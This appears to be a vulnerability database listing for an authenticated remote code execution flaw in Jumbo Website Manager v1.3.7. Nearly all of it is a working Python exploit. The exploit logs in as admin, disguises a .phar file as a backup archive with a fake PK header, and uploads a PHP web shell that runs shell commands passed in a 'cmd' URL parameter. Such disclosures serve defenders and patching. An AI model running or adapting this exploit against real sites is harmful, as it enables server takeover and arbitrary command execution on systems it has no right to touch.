Jumbo Website Manager - Remote Code Execution

🗓️ 09 Apr 2026 00:00:00Reported by Mirabbas AğalarovType
Remote code execution vulnerability in Jumbo Website Manager allows exploitation.
#Exploit Title: Jumbo Website Manager  - Remote Code Execution 
#Application: Jumbo Website Manager
#Version: v1.3.7
#Bugs:  RCE
#Technology: PHP
#Vendor URL: https://sourceforge.net/projects/jumbo/
#Software Link: https://sourceforge.net/projects/jumbo/
#Date of found: 28.10.2025
#Author: Mirabbas Ağalarov
#Tested on: Linux 


import requests
from typing import Tuple, Optional

class JumboCMSExploit:
    def __init__(self, base_url: str = "http://localhost"):
        self.base_url = base_url
        self.session = requests.Session()
        
    def login(self, username: str, password: str) -> bool:
        """
        Login to Jumbo CMS
        
        Args:
            username: Username
            password: Password (already hashed)
            
        Returns:
            True if login successful, False otherwise
        """
        print(f"[*] Attempting login as: {username}")
        
        url = f"{self.base_url}/jumbo_files/jumbo/p_login.php"
        
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0",
            "Content-Type": "application/x-www-form-urlencoded",
            "Origin": self.base_url,
            "Referer": f"{self.base_url}/jumbo_files/jumbo/loginpage.php",
        }
        
        data = {
            "username": username,
            "password": password
        }
        
        response = self.session.post(url, headers=headers, data=data, allow_redirects=False)
        
        if response.status_code in [200, 302]:
            print(f"[+] Login successful! Status: {response.status_code}")
            print(f"[+] Cookies: {self.session.cookies.get_dict()}")
            return True
        else:
            print(f"[-] Login failed! Status: {response.status_code}")
            return False
    
    def upload_file(self, filename: str, content: bytes) -> Tuple[bool, str]:
        """
        Upload a file to the backup manager
        
        Args:
            filename: Name of file to upload (e.g., test.phar)
            content: Binary content of the file
            
        Returns:
            Tuple of (success, response_text)
        """
        print(f"[*] Uploading file: {filename}")
        
        url = f"{self.base_url}/jumbo_files/jumbo/backupmanager/fileupload/php.php"
        
        params = {"qqfile": filename}
        
        # Disguise .phar as .jbox
        display_name = filename.replace('.phar', '.jbox')
        
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0",
            "Accept": "*/*",
            "X-Requested-With": "XMLHttpRequest",
            "X-File-Name": display_name,
            "Content-Type": "application/octet-stream",
            "Origin": self.base_url,
            "Referer": f"{self.base_url}/jumbo_files/jumbo/backupmanager/loadbackup.php",
        }
        
        response = self.session.post(url, params=params, headers=headers, data=content)
        
        if response.status_code == 200:
            print(f"[+] Upload successful!")
            print(f"[+] Response: {response.text}")
            return True, response.text
        else:
            print(f"[-] Upload failed! Status: {response.status_code}")
            return False, response.text
    
    def exploit(self, username: str, password: str, filename: str, php_code: str) -> bool:
        """
        Complete exploit: Login + Upload
        
        Args:
            username: Login username
            password: Login password (hashed)
            filename: Filename to upload
            php_code: PHP code to execute
            
        Returns:
            True if exploit successful
        """
        # Step 1: Login
        if not self.login(username, password):
            print("[-] Exploit failed at login stage")
            return False
        
        # Step 2: Create malicious file content
        # PK header to disguise as archive
        file_content = b'PK\x03\x04\x0a\x00\x00\x00\x00\x00' + php_code.encode()
        
        # Step 3: Upload
        success, response = self.upload_file(filename, file_content)
        
        if success:
            print("\n[+] Exploit completed successfully!")
            uploaded_path = f"{self.base_url}/jumbo_files/jumbo/backupmanager/fileupload/uploads/backup.phar?cmd=whoami"
            print(f"[+] File possibly uploaded to: {uploaded_path}")
            return True
        else:
            print("[-] Exploit failed at upload stage")
            return False


if __name__ == "__main__":
    print("="*70)
    print("Jumbo CMS Authenticated RCE via File Upload Exploit")
    print("="*70)
    print()
    
    # Configuration
    TARGET = "http://localhost"
    USERNAME = "admin"
    PASSWORD = "6f7303f028531527b2da3620ccaf25ee384ae7db"  
    FILENAME = "test123.phar"
    PHP_CODE = '<?php echo system($_GET["cmd"]);?>'
    
    # Run exploit
    exploit = JumboCMSExploit(TARGET)
    exploit.exploit(USERNAME, PASSWORD, FILENAME, PHP_CODE)
09 Apr 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9